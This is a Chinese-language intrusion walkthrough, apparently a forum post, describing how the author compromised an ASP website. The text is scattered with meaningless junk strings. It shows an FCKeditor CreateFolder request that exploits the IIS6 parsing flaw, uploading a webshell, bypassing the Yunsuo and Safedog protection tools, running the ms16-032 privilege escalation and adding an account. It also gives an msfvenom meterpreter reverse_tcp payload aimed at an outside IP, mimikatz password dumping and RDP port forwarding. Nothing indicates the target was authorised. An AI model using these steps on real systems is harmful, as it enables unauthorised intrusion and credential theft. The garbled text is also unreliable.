|
0 B6 g) r/ R7 w. B# H
$ l) x) a, X0 V# X& o h: S1 t s
) S7 u; B6 H8 B
6 b' @% f& `9 z, y ~4 U# M' w& j
|
" U* @1 Y! ?4 j, ]2 A6 W
+ B% a% H2 o6 @. T W" l
- A Z, D' h/ @+ }: }% t+ H一、 利用getwebshell篇 - {3 d3 n' x: [5 {
; t8 r4 w! {0 L0 B
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: 1 v/ M7 T/ ?. W6 u. z4 m' D7 h

7 X, R$ O. o! B; |7 ^
( Z4 V! v- f6 `( b+ j6 C& H" y下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) 4 J" T! l0 X7 _* ~2 X+ o+ G' w

) ~! ~0 R% l) [" \$ _# A下面我们构造一个asp目录,如: ( R* d; r( E0 j4 k. L2 C
1 M/ `9 I: P+ V) Q, L/ l
8 f G. K4 G$ A
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
% ^# C0 I& q; A
8 m e2 F! v* w) D4 |
8 [# Q2 G' @5 q' G0 F' \ 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
- [7 r# X. p" u6 W
* l# u$ w7 C+ c1 ^/ V, T. p/ Z! H一、 绕过安全狗云锁提权并且加账号 3 B: Y% q' ~/ S7 }
 # b! v7 @ {6 s' R
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干 ' |# n3 e3 P# P7 Q* H
% g7 O8 x: s; a U2 E' g# a
如图: . M" f/ t% o( R

7 F# p8 A1 }- j% B% [& K/ A( z然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit + l3 G/ Q* Y9 @8 Q/ f0 L$ D" R
& V, ^/ g; ?' B. a! u1 d一、 利用metasploit
: k/ Y. u6 ~/ |3 d
/ O: q( g9 l8 b1 |9 `首先用pentestbox生成一个64位的payload如下命令
0 K' ]) ^" K0 W
1 k# A; D. d# q4 [6 bmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe ' H. I7 U0 x+ e
/ u6 }3 ]6 g' {2 x" J: D& g为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
. r" f4 s- q2 p. {
' y# ], T; b# H" ^4 m3 Y下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: - H% v1 ~6 `4 I6 f9 F

; E7 b0 B( O1 U! D( v( x d下面我们来做一个监听如下命令: # A q5 z2 ?: l: z) F$ r: l
7 X/ q) L; y( a
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
0 O, c u X# k3 i # F0 l) t- L8 u, v: d; \
9 s4 w/ N& C* U7 d b | % K: e q. q2 a+ v* ]
' o/ w `- y- H5 ?' f+ ]4 d
9 T$ c6 C+ t& w) ~ & t' L( B j& f c
. R t) E: {2 N' ]( ]0 A( V5 O
8 U7 E+ R8 n9 V, I9 M$ G
. A& ?& O( _& R! M, E
% _0 i+ ]: r4 h( D k' m $ J0 e1 x9 [2 P" ]% W
4 M9 l( x5 [, D 8 k. W0 M$ P" q( F# K! Q: V
c3 l5 `/ F1 j% g4 F- {
8 s2 }1 G- [ a2 i: Y) R( K
" \9 b' ]6 m4 U2 ~
|